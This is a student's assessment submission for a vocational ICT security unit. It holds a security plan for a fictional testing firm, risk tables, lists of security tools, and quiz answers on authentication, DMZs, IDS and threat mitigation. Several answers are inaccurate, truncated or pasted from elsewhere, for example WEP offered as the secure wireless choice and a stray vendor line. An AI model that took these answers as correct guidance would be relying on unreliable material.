Student Assessment Tasks

ICTNWK520 - Design ICT system security controls

 Assessment task 1: Project Design

SCENARIO:

 A leading software testing firm TestSoft has approached your team for development
of a security plan for them. They have submitted their organizational information
policy and requirements. Following points were highlighted by the analyst:

 All the equipment must be kept well protected from unauthorized physical access.
 A powerful SPAM filter must be used to filter out SPAM on the company’s email
system.
 All users within the domain must use the same copy of anti-virus that is managed
through the anti-virus server.
 Sensitive information must be stored in a file and the file must be protected from
unauthorized access
 Proper filtering applications must be used to protect from the malware coming from
the internet.
 All employees are subjected to moderate password policies
 Some employees often need to access the organization network remotely; the
communication taking place in such scenario must be strictly private.
 The wired and wireless LANs must be secured appropriately.
 All computers and servers must be updated regularly. The updates must be kept in a
testing phase for a 14-day period and then applied on the servers.
 Appropriate hardening measures must be taken for the SQL server along with other
servers
 Web server architecture must be designed in a way to protect it from the outside
hackers.
 A general policy regarding the account disabling and deletion.
Part A

Interacting with client to collate required information to prepare project brief:

Client Mohan
I hope you're well.

The team has developed a series of questions in order to have clarity on the client's
requirements for the development of the project.

1. What objectives does the company have with the implementation, updating and
design and implementation of IT systems?

2. How do the IT infrastructure components work? And What are the challenges facing
enterprise IT asset management?

3. What are the business needs and priorities of the company regarding the design and
implementation of authentication solutions?

4. What expectations and benefits are expected by the company in the new
implementation of the system?

5. Currently, what tools does the company handle in terms of encryption and the
software tools it currently handles?

6. They require a high security standard for access management and information
control?

7. Control tools and periodic updates and testing phases in systems and security?

8. What security controls do they currently handle and if they have presented any failure
in those controls?

9. They will need the development of security policies and internal controls with account
creation and deletion?

10. As a company, do you have any particular requirements for implementation in

design, management or security that you want to add to the project?
 Design ICT System Security Controls

ICTNWK520
Project Design

Ultimate Institute of Australia

International College

Tutor: Mohan Ganavarapu

Prepared By: Jair Miranda Gomez
ID: GT07108

 Executive Summary:
 This document provided as an annex to a security plan that aims to reduce the
security risks that the company may have our security plan.

This document is the one that we will deliver to our clients in a first contact with the
company to know the requirements:

 Table of Contents:
 Introduction
 Permission letter from IT Manager
 Letter seeking permission
 Security Plan
 Discussions

o Identification of security constraints from the business requirements

o Identification of the information and hardware security threats to the
organization
o Description of defence-in-depth model
o Description of the security threats to the business in detail. Shortly
describe the mitigation strategy.
o Risk assessment based to the threats identified.
o Threat mitigation strategies
o Development of strategies/controls to mitigate
o Monitoring measures to alert a security breach
o Implementation of a security policy
o Application of a proper SPAM, Anti-virus, Firewall, IDS and data
encryption software.
o Detail of the wired and wireless security measures
o Details of policy that has to be applied on the employees
o Authentication and authorization measures that are necessary
o Standard procedure to conduct security tests
o Recommendation / suggestion
o References
  Introduction:

This project is drafted with character to comply with the conditions of the company
Gather evidence to demonstrate consistent performance under varying network
industry conditions and includes access to Specifications that guarantee the security
of ICTs, probability, frequency and severity of direct and indirect damage,
guaranteeing the proper use of the ICT system risk analysis tools and methodologies
with an ICT environment where there are fewer security risks managing existing
organizational security policies under the experience of the organizational company
for growth and good management of technological resources

The documents that are presented below, collect all the data and
characteristics studies and research that have been obtained as a result of the
calculations; interviews conducted by the company interviews developed in the
corresponding annexes, and that allow to mark the guidelines for the
materialization of the works and installations security systems, training management
of the resources that are projected in the realization of the project

 Permission letter from IT Manager to perform the required tests.

From: [email protected]

To: [email protected]

Subject: permission letter to test the organization IT network

As you requested for the organization network access permission to test and prepare a
security plan, I am happy to approve and assist you for any further help requires from my
end

Regards

Mohan Ganavarapu.

 Letter seeking permission to obtain the logs

Purpose of Date of Request Person Requested Approving Authority

Permission
Organization
network access 15/08/2022 Jair Miranda Mohan Ganavarapu
permission to
test and prepare
a security plan

Security Plan

 Discussions:

1. Identification of security constraints from the business requirements

2. Identification of the information and hardware security threats to the
organization
3. Description of defence-in-depth model
4. Description of the security threats to the business in detail. Shortly describe
the mitigation strategy.
5. Risk assessment based to the threats identified.

Identified Risk Level Risk Severity Risk Person

Risk (Insignificant, Mitigation Responsible
moderate,
catastrophic)
Highly
sensitive
information
and High Moderate High IT Manager
documents,
which is stored
in the different
computer
devices,
maintain
access codes
and
permissions
for authorized
personnel

Company
personnel,
network
connection High Moderate High IT Manager
services,
servers and
other
computer
tools that
allow the
proper
functioning of
the company.

Identify
different risks
and Medium Insignificant Medium
vulnerabilities IT Manager
those viruses,
malware, and
software and
hardware
failures that
have already
occurred, and
also those
that may
occur more
easily in the
future

Guarantee
that the
company will Medium Insignificant Medium IT Security
be able to
remain
operational
and
functional
during the
occurrence of
the security
eventuality

The
personnel of
the computer low Insignificant low
area of the Manager
company RRHH
must be kept
in constant
training, so
that it can
provide the
best care and
effectiveness
in the event
of any mishap
in this area,

6. Threat mitigation strategies

Identified Risk Risk Level Person When

Responsible
Highly sensitive
information and
documents, which
is stored in the High Jair Miranda 2/08/2022
different computer
devices, maintain
access codes and
permissions for
authorized
personnel

Company
personnel, network
connection
services, servers Juan Saldarriaga 15/08/2022
and other High
computer tools
that allow the
proper functioning
of the company.

Identify different
risks and
vulnerabilities Medium Juan Saldarriaga 15/08/2022
those viruses,
malware, and
software and
hardware failures
that have already
occurred, and also
those that may
occur more easily
in the future

Guarantee that the

company will be
able to remain Medium Jair Miranda 30/08/2022
operational and
functional during
the occurrence of
the security
eventuality

The personnel of
the computer area
of the company Low Nestor Vincent 15/09/2022
must be kept in
constant training,
so that it can
provide the best
care and
effectiveness in the
event of any
mishap in this
area,

7. Development of strategies/controls to mitigate/avoid the threats

Risk Type Strategies/ Controls mitigate /Avoid the threats

Security on company  Plan for incoming devices and how you will
devices with confidential protect them.
information and  Use encrypted and authenticated connections
documents when possible.
 Plan to rotate access passwords, access keys,
and authentication credentials.

 Keep track of the devices used. ...

Security in the network  Create a digital security policy. ...
Connection services,  Monitor network data traffic. ...
servers and other  Use a good virtual private network (VPN)...
computer tools.  Use secure Wi-Fi.

 Install antivirus/malware software. ...

Management of risks  Keep your antivirus software up to date. ...
and vulnerabilities.  Run regularly scheduled scans with your
those viruses, malware antivirus software. ...
and software and  Keep your operating system up to date. ...
hardware failures  Protect your red.

 Backing up is via cloud storage, which protects

Functionality of the against damage to the computer. T
company can operate  This means that if the user loses the media it was
and during any security found on, they can still access it remotely and
eventuality can quickly and easily restore it.
Training, for personnel  Training, permanent on information security risks
in charge of information for company personnel and documents
management and
security

8. Monitoring measures to alert a security breach

Security Measures:

 Specific clean desk policies: screen lock, user access and

 password etc.
 Physical controls such as intrusion detection, video surveillance, control
and registration of Access to certain areas, etc.
 Controls and procedures against environmental damage or natural disasters.
 User notifications: presence of files with unusual characters,
 receiving emails with suspicious attachments, strange behaviour of devices,
inability to access certain services, loss/theft of storage devices or
equipment with
information
 Alerts generated by antivirus software.
 Excessive and sudden consumption of memory or disk in servers and
equipment.
 Network traffic anomalies or traffic spikes at unusual hours.
 Alerts from intrusion detection/prevention systems (IDS/IPS).
 Alerts from event realization systems.
 Analysis of logs of connections made through corporate proxies or
connections blocked on firewalls.
 Log analysis of servers and applications with failed access attempts
authorized.
 Log analysis in Data Loss Prevention tools.

9. Implementation of a security policy

 keep each and every one of the current security policies updated in the
knowledge of the entire company
 Track communications made to stakeholders in cases data security breach.
 Carry out random reviews of the content of the different notifications that are
send to affected stakeholders.
 Keep proof of the entire procedure in case, in the future, the interested party
He decided to sue the company.
 10. Application of a proper SPAM, Anti-virus, Firewall, IDS and data encryption
software.
Application type Uses Example

SPAM Antispam techniques are GravityZone Security –

solutions that allow users to Bitdefender
prevent or attack the delivery EuropeanMX
of spam (unwanted mail). AntiSpam Exclaimer
These automatically scan all GFI Mail Essentials
incoming emails sent to a MX GuardDog
mailbox for this purpose.

Anti-virus An antivirus is a type of Kaspersky -> Recommended

software used to prevent, by Incuatro.
search for, detect, and ESET -> Recommended by
remove viruses from a Incuatro.
computer. Once installed, Norton.
most antivirus software AVG.
automatically runs in the PC Tools.
background to provide real- BitDefender.
time protection against virus avast.
attacks. McAfee.

Firewall It is a system whose function SolarWinds Network Firewall

is to prevent and protect our Security Management.
private network from ZoneAlarm.
intrusions or attacks from Comfortable Firewall.
other networks, blocking TinyWall.
access to it. Allows incoming Netdefender.
and outgoing traffic between Glasswire.
networks or computers on PeerBlock.
the same network AVS firewall.

IDS Intrusion detection system: it Snort.

is an application used to Security Onion.
detect unauthorized access OpenWIPS-NG.
to a computer or a network, meerkat
that is, they are systems that BroIDS.
monitor incoming traffic and OSSEC.
compare it with an updated Open Source Tripwire.
database of known attack AIDE.
signatures

Data Encryption encryption is one of the most last pass

popular and effective data BitLocker
security methods used by VeraCrypt
organizations. There are two File Vault 2
main types of data discocryptor
encryption: asymmetric
encryption, also known as
public key encryption
11. Detail of the wired and wireless security measures

We will make available three solutions to protect wireless LAN encryption and
authentication: Wi-Fi Protected Access (WPA), Wi-Fi Protected Access 2 (WPA2),
and Virtual Private Networking (VPN) connection.

WPA and WPA2: These Wi-Fi Alliance standards-based security certifications for
large and growing enterprise LANs and small or home offices provide mutual
authentication to verify individual users and advanced encryption
VPN: provides effective security for users who access the network wirelessly while
traveling or away from their offices.

Network computers connected to the network use secure protocols such as

HTTPS or SSH, the insecurity of the network is less. But you still have to protect it
because there are many insecure protocols, like HTTP or DNS. A machine
offering TCP/IP services has to open certain ports, to which trusted or untrusted
computers can connect.
VLAN makes for better security and performance, because if there is an attack on
one VLAN, the other VLANs are not affected, unless there is excess traffic,

12. Details of policy that has to be applied on the employees

The ones that we definitely have to avoid. These are behaviours and practices
that can put systems and information at risk, such as opening suspicious files or
links, sharing passwords, or using open Wi-Fi networks.
The ones that definitely what we have to do always, to maintain a correct level of
protection and security. For example:
Encrypt sensitive files
Implement backups
Use passwords and renew them regularly
Use VPN
Install anti-virus and anti-malware software
 Information privacy, and its protection against access by unauthorized persons
such as hackers.
Data integrity, and its protection against corruption due to media failure or
deletion.
Availability of services, against internal or external technical failures.

13. Authentication and authorization measures that are necessary

Access control access privileges to users we can ensure the confidentiality and
availability of information; but, in addition, we can:
That only authorized persons may access certain resources (systems, equipment,
programs, applications, databases, networks, etc...) due to their work functions.
They allow us to identify and audit the accesses made, apply internal security
controls.
Document the access procedures to the different applications that process
personal data.
In short, control access from different aspects: network, systems and applications.

14. Standard procedure to conduct security tests

The activities in this phase of security testing procedures for are the following:
1. Run the tests
2. The chosen tests are executed with the selected and configured tools according
to the characterization of the applications in question. While the tests are running,
the tools show reports on the vulnerabilities found along the way.
3. Register vulnerabilities
4. Once the activity of executing the tests is finished, the reports with the
vulnerabilities detected in the applications are generated. These vulnerabilities are
saved for later analysis and to evaluate with the development team their impact on
the system.
5. Evaluate report results
6. The tester generates a description of the vulnerabilities detected to discuss with
programmers or system development team members. The impact, type of
vulnerability and a possible solution recommendation are analysed
15. Recommendation / suggestion

Teams that have only the minimum necessary to carry out their tasks are less
likely to fall victim to an attack. Installation of applications and other programs
should be done only if necessary the identification of systems, as well as
operational, technical and security management controls; as well as the
company's human resource requirements such as required personnel, required
skills and available personnel to carry out business security practices.
Make use of controls such as antivirus and antimalware; different types of firewall;
intrusion detection and prevention systems; black and white lists (whitelisting and
blacklisting); update management software, Therefore, tests must be carried out
on the systems and controls to verify that they are still useful. They can be
penetration tests or a search for vulnerabilities in the systems to correct the risk in
an appropriate way risk assessment and management; preparing an inventory of
assets and applications; the actions to be taken in the event of an incident; time
objectives such as RTO and RPO; the maximum terms to maintain continuity in
the event of a failure such as WRT, MTD and MTPD; countermeasures to different
threats,

16. References:

Principles of Computer Security CompTIA Security+ and Beyond Lab Manual,

Second Edition (CompTIA Authorized) 2nd Edition
by Vincent Nestler (Author), Gregory White (Author), Wm. Arthur
Conklin  (Author), Matthew Hirsch (Author), Corey Schou (Author)
 ICTNWK520 Design ICT system security and controls

Answer the following questions

Section 1
1 Which of the following is a set of voluntary standards governing encryption?
B PKCS
Public Key Cryptography Standards is a set of voluntary standards for public
key cryptography. This set of standards is coordinated by RSA.

2 Which protocol is used to create a secure environment in a wireless network?

B Wired Equivalent Privacy (WEP) is designed to provide security equivalent to
that of a wired network. WEP has vulnerabilities and isnt considered highly
secure.

3 An Internet server interfaces with TCP/IP at which layer of the DOD model?
c The Process layer interfaces with applications and encapsulates traffic through
the Host-to-Host or Transport layer, the Internet layer, and the Network Access
layer

4 You want to establish a network connection between two LANs using the Internet.
Which technology would best accomplish that for you?
B L2TP (Layer 2 Tunneling Protocol) is a tunneling protocol that can be used
between LANs. L2TP isnt secure, and you should use IPSec with it to provide
data security

5 Which design concept limits access to systems from outside users while protecting
users and systems inside the LAN?
A DMZ (demilitarized zone) is an area in a network that allows restrictive access
to untrusted users and isolates the internal network from access by external
users and systems. It does so by using routers and firewalls to limit access to
 sensitive network resources.

6 Which kind of attack is designed to overload a particular protocol or service?

D Flood attack is designed to overload a protocol or service by repeatedly
initiating a request for service. This type of attack usually results in a DoS
(denial of service) situation
occurring because the protocol freezes or excessive bandwidth is used in the
network as a result of the requests.

7 What is the process of making an operating system secure from attack called?
A Hardening

8 The integrity objective addresses which characteristic of information security?

A Verification that information is accurate
To meet the goal of integrity, you must verify that the information being used is
accurate and hasn’t been tampered with. Integrity is coupled with accountability
to ensure that data is accurate and that a final authority exists to verify this, if
needed

9 The confidentiality objective addresses which characteristic of information security?

A Verification that data is kept private and secure

10 Which mechanism or process is used to enable or disable access to a network

resource based on an IP address?
B ACL: Access control lists (ACLs) are used to allow or deny an IP address
access to a network. ACL mechanisms are implemented in many routers,
firewalls, and other network devices. For additional information

11 Which of the following would provide additional security to an Internet web server?
C . Changing the default port for traffic to 443

12 An individual presents herself at your office claiming to be a service technician. She

wants to discuss your current server configuration. This may be an example of what
type of attack?
A Social engineering is using human intelligence methods to gain access or
information about your organization.
13 What encryption process uses one message to hide another?
A Steganography is the process of hiding one message in another. Also called
electronic watermarking

14 Which policy dictates how computers are used in an organization?

C Use policy

15 You want to grant access to network resources based on authenticating an

individual’s retina during a scan. Which security method uses a physical characteristic
as a method of determining identity?
C Biometrics is the authentication process that uses physical characteristics, such
as a palm print or retinal pattern, to establish identification.

16 The process of verifying the steps taken to maintain the integrity of evidence is called
what?
B Chain of custody ensures that each step taken with evidence is documented
and accounted for from the point of collection. Chain of custody is the Who,
What, When, Where, and Why of evidence storage

17 Which system would you install to provide active protection and notification of security
problems in a network connected to the Internet?
A IPS intrusion prevention system (IPS) provides active monitoring and rule-based
responses to unusual activities on a network. A firewall, for example, provides
passive security by preventing access from unauthorized traffic. If the firewall
were compromised, the IPS would notify you based on rules that it’s designed to
implement

18 What type of program exists primarily to propagate and spread itself to other
systems?
D Worm is designed to multiply and propagate. Worms may carry viruses that
cause system destruction, but that isn’t their primary mission

19 Which of the following is a major security problem with FTP servers?

C User IDs and passwords are unencrypted.

20 Which access control method is primarily concerned with the role that individuals have
 in the organization?
C RBAC Role-based access control (RBAC) is primarily concerned with providing
access to systems that a user needs based on the user’s role in the
organization

Section 2

1 What is the difference between security policy and a security plan?

The difference between a security plan and a security policy? A security policy
identifies the rules that will be followed to maintain security in a system, while
a security plan details how those rules will be implemented. A security policy
is generally included within a security plan. A security plan might be as simple
as a verbal statement from the highest-level management that all accounts on
a system must be protected by the use of a password.

2 What is a IDS and a IPS

intrusion detection system (IDS) monitors traffic on your network, analyses

that traffic for signatures matching known attacks, and when something
suspicious happens, you're alerted. In the meantime, the traffic keeps flowing.
An intrusion prevention system (IPS) also monitors traffic

3 Differentiate between IDS and Firewall

Firewall is a device and/or a software that stands between a local network and
the Internet, and filters traffic that might be harmful.
An Intrusion Detection System (IDS) is a software or hardware device installed
on the network (NIDS) or host (HIDS) to detect and report intrusion attempts
to the network.

4 What do you mean by server hardening

Server hardening is a general system hardening process that involves

 securing the data, ports, components, functions, and permissions of a server
using advanced security measures at the hardware, firmware, and software
layers.

5 Give one example of a three factor authentication

This category includes one-time password tokens (OTP tokens), key fobs,
smartphones with OTP apps, employee ID cards and SIM cards.
Inherence factors include any biological traits the user has that are confirmed
for log in. This category includes the scope of biometrics such as retina scans,
iris scans, fingerprint scans, finger vein scans, facial recognition, voice
recognition, hand geometry and even earlobe geometry

Section 3

1 What is the relation between security, usability and cost?

Historically, more often than not, effective security came at the expense of
usability. And usability came at the expense of security. Many continue to go
by the notion that there is no way to achieve both effective security and
usability simultaneously. It just does not wor

2 What is confidentiality, integrity and availability in security?

In this context, confidentiality is a set of rules that limits access to information,

integrity is the assurance that the information is trustworthy and accurate, and
availability is a guarantee of reliable access to the information by authorized
people

3 Write a short note on defence-in-depth model?

Defense in depth is a strategy that leverages multiple security measures to

protect an organization's assets. The thinking is that if one line of defense is
compromised, additional layers exist as a backup to ensure that threats are
 stopped along the way

4 What is a DMZ? How do you implement a DMZ?

DMZ Network is a perimeter network that protects and adds an extra layer
of security to an organization’s internal local-area network from untrusted
traffic. A common DMZ is a subnetwork that sits between the public internet
and private networks

These servers and resources are isolated and given limited access to the
LAN to ensure they can be accessed via the internet but the internal LAN
cannot. As a result, a DMZ approach makes it more difficult for a hacker to
gain direct access to an organization’s data and internal servers via the
internet

5 What is a denial of service attack? Give 2 examples

There are two general methods of DoS attacks: flooding services or crashing
services. Flood attacks occur when the system receives too much traffic for the
server to buffer, causing them to slow down and eventually stop. Popular flood
attacks include:
 Buffer overflow attacks –
 DoS attack.

6 Explain the term VPN

A VPN, or virtual private network, is a technology that establishes a secure

tunnel between two or more devices.
An Internet VPN, such as Mullvad (that's us!), offers a tunnel between you and
the Internet, allowing you to browse the web securely and privately, even when
using a public WiFi network at a cafe or hotel.
7 Explain the following in brief and give mitigation strategy
Virus,

 Installation of the appropriate software application is necessary but it is

certainly not sufficient in order to keep malicious code at bay
 Deploying appropriate Intrusion Detection and Prevention systems is
also effective in warding off such dangers. One example of this is the
CSA or Cisco Security Agent

Worm,

 Containment: This step involves compartmentalization of the network

into infected and not infected parts. This helps to contain the spread of
the worm attack.
 Inoculation: This step involves scanning and patching of the vulnerable
systems.
 Quarantine: In this step the infected machine is detected, disconnected
and removed. If removal is not possible the infected machines are
blocked.

Root kits,

 Scanners are effective against rootkit attacks. Scanners are used to

analyze and detect rootkits in the entire system. Rootkit scanners are
most effective against application rootkits
 complete protection of the system. Backup all your data, delete and
reinstall the system to ensure protection from more sophisticated
rootkits such as bootkits or firmware rootkits.

XSS,

 Whenever possible, prohibit HTML code in inputs. Preventing users

from posting HTML code into form inputs is a straightforward and
effective measure.
 Validate inputs. If you're going to accept form inputs, validating the data
to ensure it meets specific criteria will be helpful
 Secure your cookies. Setting rules for your web applications defining
how cookies are handled can prevent XSS and even block JavaScript
from accessing cookies

MITM

 At a minimum, every enterprise application should be encrypted,

including web, email and voice traffic — not just sensitive
communications.
 The internet adage of “be liberal in what you accept” means many out-
of-the-box web servers accept older protocols and weaker encryption
or authentication algorithms.
  They should also consider adding certificate pinning, which reduces the
possibility that a fake digital certificate can be used by an MITM
attacker to access their applications and web services.

8 What is one, two and three factor authentication?

One-factor authentication – this is “something a user knows.” The most

recognized type of one-factor authentication method is the password.
Two-factor authentication – in addition to the first factor, the second factor is
“something a user has.” Examples of something a user has are a fob that
generates a pre-determined code, a signed digital certificate or even a
biometric such as a fingerprint. The most recognized form of two-factor
authentication is the ubiquitous RSA SecurID fob.
Three-factor authentication – in addition to the previous two factors, the third
factor is “something a user is.” Examples of a third factor are all biometric such
as the user's voice, hand configuration, a fingerprint, a retina scan or similar.
The most recognized form of three-factor authentication is usually the retina
scan.